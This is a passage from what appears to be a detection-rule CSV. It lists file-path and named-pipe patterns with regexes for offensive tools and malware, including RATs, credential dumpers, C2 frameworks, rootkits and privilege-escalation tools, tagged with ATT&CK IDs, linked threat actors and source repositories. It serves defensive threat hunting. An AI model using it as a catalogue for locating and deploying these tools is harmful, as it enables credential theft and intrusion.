"*\PHVNC.pdb*",".{0,1000}\\PHVNC\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","17253"
"*\physmem2minidump.py*",".{0,1000}\\physmem2minidump\.py.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","17254"
"*\physmem2profit-master*",".{0,1000}\\physmem2profit\-master.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","17255"
"*\PickleC2\Core\*.py*",".{0,1000}\\PickleC2\\Core\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","17256"
"*\PILOT.ps1*",".{0,1000}\\PILOT\.ps1.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","17258"
"*\PILOT\ATC.py*",".{0,1000}\\PILOT\\ATC\.py.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","17259"
"*\PingRAT\*",".{0,1000}\\PingRAT\\.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","0","N/A","N/A","10","10","416","55","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z","17262"
"*\PingSweep.ps1*",".{0,1000}\\PingSweep\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17263"
"*\PInject.ps1*",".{0,1000}\\PInject\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","17264"
"*\pipe\$77control*",".{0,1000}\\pipe\\\$77control.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","17265"
"*\pipe\\cachedumppipe*",".{0,1000}\\pipe\\\\cachedumppipe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#namedpipe","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","17266"
"*\pipe\brutepipe*",".{0,1000}\\pipe\\brutepipe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#namedpipe","N/A","10","10","N/A","N/A","N/A","N/A","17267"
"*\pipe\cachedumppipe*",".{0,1000}\\pipe\\cachedumppipe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#namedpipe","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","17268"
"*\pipe\ElevationPipe*",".{0,1000}\\pipe\\ElevationPipe.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#namedpipe","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","17270"
"*\pipe\GodPotato*",".{0,1000}\\pipe\\GodPotato.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#namedpipe","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","17271"
"*\pipe\gsecdump_*",".{0,1000}\\pipe\\gsecdump_.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","#namedpipe","N/A","10","10","N/A","N/A","N/A","N/A","17272"
"*\pipe\MIMIKATZ*",".{0,1000}\\pipe\\MIMIKATZ.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#namedpipe","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","17273"
"*\pipe\moj_ML_ntsvcs *",".{0,1000}\\pipe\\moj_ML_ntsvcs\s.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","#namedpipe","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","17274"
"*\pipe\RustPotato*",".{0,1000}\\pipe\\RustPotato.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","#content #namedpipe","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","17279"
"*\pipe\SigmaPotato*",".{0,1000}\\pipe\\SigmaPotato.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#namedpipe","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","17280"
"*\pipe\WCEServicePipe*",".{0,1000}\\pipe\\WCEServicePipe.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#namedpipe","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","17281"
"*\PipeViewer.exe*",".{0,1000}\\PipeViewer\.exe.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","17282"
"*\PipeViewer.sln*",".{0,1000}\\PipeViewer\.sln.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","17283"
"*\PipeViewer\Program.cs*",".{0,1000}\\PipeViewer\\Program\.cs.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","17284"
"*\pkg\merlin.go*",".{0,1000}\\pkg\\merlin\.go.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","17285"
"*\Plasma RAT.exe*",".{0,1000}\\Plasma\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17286"
"*\Plasma RAT.exe*",".{0,1000}\\Plasma\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17287"
"*\Plugins\HRDP.dll*",".{0,1000}\\Plugins\\HRDP\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","17288"
"*\Plugins\HVNC.dll*",".{0,1000}\\Plugins\\HVNC\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","17289"
"*\Plugins\PreventSleep.dll*",".{0,1000}\\Plugins\\PreventSleep\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","17290"
"*\Plugins\RemoteCamera.dll*",".{0,1000}\\Plugins\\RemoteCamera\.dll.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","17291"
"*\Plugins\RemoteDesktop.dll*",".{0,1000}\\Plugins\\RemoteDesktop\.dll.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","17292"
"*\Plugins\Resources\WindowsFormsApp1.exe*",".{0,1000}\\Plugins\\Resources\\WindowsFormsApp1\.exe.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","N/A","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","17293"
"*\PME\*-ConsoleHistory.txt*",".{0,1000}\\PME\\.{0,1000}\-ConsoleHistory\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17294"
"*\PME\Console History\*",".{0,1000}\\PME\\Console\sHistory\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17295"
"*\PME\eKeys\*",".{0,1000}\\PME\\eKeys\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17296"
"*\PME\LogonPasswords*",".{0,1000}\\PME\\LogonPasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17297"
"*\PME\LSA\*",".{0,1000}\\PME\\LSA\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17298"
"*\PME\MSSQL\*",".{0,1000}\\PME\\MSSQL\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17299"
"*\PME\SAM\*",".{0,1000}\\PME\\SAM\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17300"
"*\PME\Sessions\*",".{0,1000}\\PME\\Sessions\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17301"
"*\PME\SMB\*",".{0,1000}\\PME\\SMB\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17302"
"*\PME\Spraying\*",".{0,1000}\\PME\\Spraying\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17303"
"*\PME\Tickets\Kerbdump*",".{0,1000}\\PME\\Tickets\\Kerbdump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17304"
"*\PME\Tickets\MimiTickets*",".{0,1000}\\PME\\Tickets\\MimiTickets.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17305"
"*\PME\User Files\*",".{0,1000}\\PME\\User\sFiles\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17306"
"*\PME\VNC\*",".{0,1000}\\PME\\VNC\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","17307"
"*\pngZIP.ps1*",".{0,1000}\\pngZIP\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","17308"
"*\PoC\PrivilegeEscalation*",".{0,1000}\\PoC\\PrivilegeEscalation.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","0","N/A","N/A","8","2","138","25","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z","17309"
"*\POC_DLL.dll*",".{0,1000}POC_DLL\.dll.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","17310"
"*\POC_DLL.vcxproj*",".{0,1000}\\POC_DLL\.vcxproj.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","17311"
"*\Pocket RAT - Client.exe*",".{0,1000}\\Pocket\sRAT\s\-\sClient\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17312"
"*\Poisoners-Session.log*",".{0,1000}\\Poisoners\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","17313"
"*\PoisonTendy\Invokes\*",".{0,1000}\\PoisonTendy\\Invokes\\.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","17314"
"*\polenum.py*",".{0,1000}\\polenum\.py.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","17315"
"*\PoolParty.cpp*",".{0,1000}\\PoolParty\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","17316"
"*\PoolParty.exe*",".{0,1000}\\PoolParty\.exe.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","17317"
